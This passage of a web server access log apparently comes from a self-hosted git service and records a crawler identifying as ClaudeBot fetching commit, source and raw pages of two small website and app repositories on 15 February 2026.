git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Fdcsintegration.png" [Client 216.73.216.188] [Length 19139] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Ffavicon.ico" [Client 216.73.216.188] [Length 19132] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 5772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 15634] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15602] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 20103] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13199] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15596] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14865] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 216.73.216.188] [Length 10535] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12678] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14860] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10983] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14707] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16518] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14253] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13921] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET 